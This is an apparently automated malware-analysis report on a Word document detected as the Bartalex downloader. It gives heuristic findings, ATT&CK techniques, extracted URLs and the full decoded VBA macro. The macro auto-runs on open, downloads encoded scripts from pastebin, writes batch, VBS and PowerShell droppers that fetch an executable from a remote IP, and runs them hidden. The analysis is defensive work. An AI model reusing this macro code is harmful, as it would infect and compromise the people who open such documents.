MALICIOUS
354
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1566.001 Spearphishing Attachment
The sample contains VBA macros with Auto_Open and other auto-execution markers, indicating it's designed to run code upon opening. The script attempts to download content from 'http://pastebin.com/raw.php?i=aktK9NDE' using MSXML2.ServerXMLHTTP, decodes it, and then extracts further URLs and data. This strongly suggests a downloader functionality, likely to fetch and execute a second-stage payload. The presence of CreateObject and Shell calls further supports this malicious intent.
Heuristics 13
-
ClamAV: Doc.Downloader.Bartalex-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Bartalex-1
-
VBA macros detected medium 9 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell(b, 0) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set obg = CreateObject("MSXML2.ServerXMLHTTP") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Quick = GetObject(a) -
Payload URL assembled from a Chr()/Asc() string expression (3 URLs) high OLE_VBA_EXPR_DROPPER_URLA VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Environ(a) -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://savepic.su/5564915.png Referenced by macro
- http://savepic.su/5565939.pngReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://pastebin.com/raw.php?i=123123123Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6229 bytes |
SHA-256: 1abc0d3e4fd8ce6df0ac0c4f5ad5f79094ba5c9f76ceee0a9a6f5105f4bac87a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
hufewf
End Sub
Sub hufewf()
Dim retVal As Variant
FL2 = CStr(Int((100000 * Rnd) + 10000))
PH2 = Module1.Bad("TEMP") + "\"
JUDQW = "bajwqhduqwkhdbaqwet"
WKDOQ = "461237618273612"
PSFL = FL2 + "." + "p" + "s" + "1"
VBFL = FL2 + ".v" + "b" + "s"
BAFL = FL2 + Chr(45 + Sgn(Val(FL2))) + Left(JUDQW, 2) + Right(JUDQW, 1)
KDOW = "pasteb"
'MsgBox (BAFL)
INTG = "object"
AFTG = "module"
SXE = ".exe"
GNG = ".png"
PHT = "http://"
PBIN = PHT + KDOW + "in.com/raw.php?i="
SPIC = PHT + "sav" & "epic.su/"
PSPTH = PH2 + PSFL
VBPTH = PH2 + VBFL
BAPTH = PH2 + BAFL
AFT = FreeFile
BFT = FreeFile
CFT = FreeFile
DFT = FreeFile
EFT = FreeFile
Dim obg As Object
Dim asdwq As String
Set obg = CreateObject("MSXML2.ServerXMLHTTP")
obg.Open "GET", PBIN + "aktK9NDE"
obg.Send ""
CONT = obg.ResponseText
asdwq = CONT
CONT = Module1.Decode(asdwq)
TVT10 = Module1.Tort(CONT, "text10")
TVT20 = Module1.Tort(CONT, "text20")
TVT21 = Module1.Tort(CONT, "text21")
TVT30 = Module1.Tort(CONT, "text30")
TVT31 = Module1.Tort(CONT, "text31")
XPT1 = Module1.Tort(CONT, "stext1")
XPT2 = Module1.Tort(CONT, "stext2")
XPT3 = Module1.Tort(CONT, "stext3")
WVR = Module1.Bad("USERPROFILE")
post1 = InStr(WVR, "sers\")
If (post1 <> 0) Then
VRR = "1"
Else
VRR = "0"
End If
Module1.WaitFor (1)
SEXX = PHT + "91.194.254.216/us/file" + SXE
PSTB = PBIN + "123123123"
STAR1 = SPIC + "5564915" + GNG
STAR2 = SPIC + "5565939" + GNG
FFQ = "updater8"
FF = FFQ + SXE
If (VRR = "0") Then
Open BAPTH For Output As #AFT
Print #AFT, XPT1
Print #AFT, "set trfd=" + Chr(34) + PH2 + Chr(34)
Print #AFT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
Print #AFT, "set exds=" + Chr(34) + FFQ + Chr(34)
Print #AFT, XPT2
Close #AFT
Module1.WaitFor (2)
Open VBPTH For Output As #BFT
Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
Print #BFT, "jfeuygq = " + Chr(34) + FF + Chr(34)
Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
Print #BFT, XPT3
Close #BFT
Module1.WaitFor (2)
NTH1 = Module1.Great(retVal, BAPTH)
End If
If (VRR = "1") Then
Open PSPTH For Output As #CFT
Print #CFT, "$stat = '" + STAR2 + "';"
Print #CFT, "$ggtt = '" + SEXX + "';"
Print #CFT, "$pths = '" + PH2 + "';"
Print #CFT, "$wehs = '" + FL2 + "';"
Print #CFT, "$nnm = '" + FFQ + "';"
Print #CFT, TVT10
Close #CFT
Open VBPTH For Output As #DFT
Print #DFT, TVT30
Print #DFT, "currentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&djwq"
Print #DFT, TVT31
Close #DFT
Open BAPTH For Output As #EFT
Print #EFT, TVT20
Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
Print #EFT, "set Gds4=" + Chr(34) + PH2 + Chr(34) + "%Ads3%"
Print #EFT, TVT21
Close #EFT
Module1.WaitFor (1)
NTH2 = Module1.Great(retVal, BAPTH)
End If
NTH3 = Module2.Tag("<" + INTG + ">", "</" + INTG + ">", 1)
NTH4 = Module2.Tag("<" + AFTG + ">", "</" + AFTG + ">", 2)
NTH5 = Module2.Tag("<" + INTG + ">", "", 3)
NTH6 = Module2.Tag("</" + INTG + ">", "", 3)
NTH7 = Module2.Tag("<" + AFTG + ">", "", 3)
NTH8 = Module2.Tag("</" + AFTG + ">", "", 3)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Attribute VB_Name = "Module1"
Public Function Great(a As Variant, b)
a = _
Shell(b, 0)
Great = a
End Function
Public Function Tort(a, b As String)
Dim krd, lent As Integer
krd = InStr(1, a, "<" + b + ">") + 8
lent = InStr(1, a, "</" + b + ">") - krd
KLMN = Mid(a, krd, lent)
Tort = KLMN
End Function
Public Function Dtgt(a As String)
Quick = GetObject(a)
End Function
Public Function Quick(a As String)
Quick = GetObject(a)
End Function
Public Function Bad(a As String)
Bad = _
Environ(a)
End Function
Sub WaitFor(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub
Public Function Decode(ByVal strData As String) As String
Dim objXML As Object
Dim objNode As Object
Set objXML = CreateObject("MSXML2.DOMDocument")
Set objNode = objXML.createElement("b64")
objNode.DataType = "bin.base64"
objNode.Text = strData
Decode = objNode.nodeTypedValue
Set objNode = Nothing
Set objXML = Nothing
End Function
Attribute VB_Name = "Module2"
Public Function Tag(a As String, b As String, c As Integer)
Dim selectedText As String
Dim hhhg, selRange As Range
Set hhhg = ActiveDocument.Range
With hhhg.Find
.Text = a
.MatchWholeWord = True
.Execute
hhhg.Collapse direction:=wdCollapseEnd
JIDSF = "kh 21jkh3 21jkh3g j12g3jk12g3 31"
JQWQWIDSF = "kh 21jkh3 21jkh3g j12g3jk12g3 31"
JQWEQWDIDSF = "kh 21jkh3 21jkh3g j12g3jk12g3 31"
Set selRange = ActiveDocument.Range
JIDSF = "kh 21jkh3 21jkh3g j12g3jk12g3 31"
JQWQWIDSF = "kh 21jkh3 21jkh3g j12g3jk12g3 31"
JQWEQWDIDSF = "kh 21jkh3 21jkh3g j12g3jk12g3 31"
selRange.Start = hhhg.End
.Text = b
.MatchWholeWord = True
.Execute
hhhg.Collapse direction:=wdCollapseStart
selRange.End = hhhg.Start
If (c = 1) Then
selectedText = selRange.Delete
End If
If (c = 2) Then
selRange.Font.Color = wdColorBlack
End If
If (c = 3) Then
With hhhg.Find
.Text = a
.Replacement.Text = ""
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
End If
End With
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.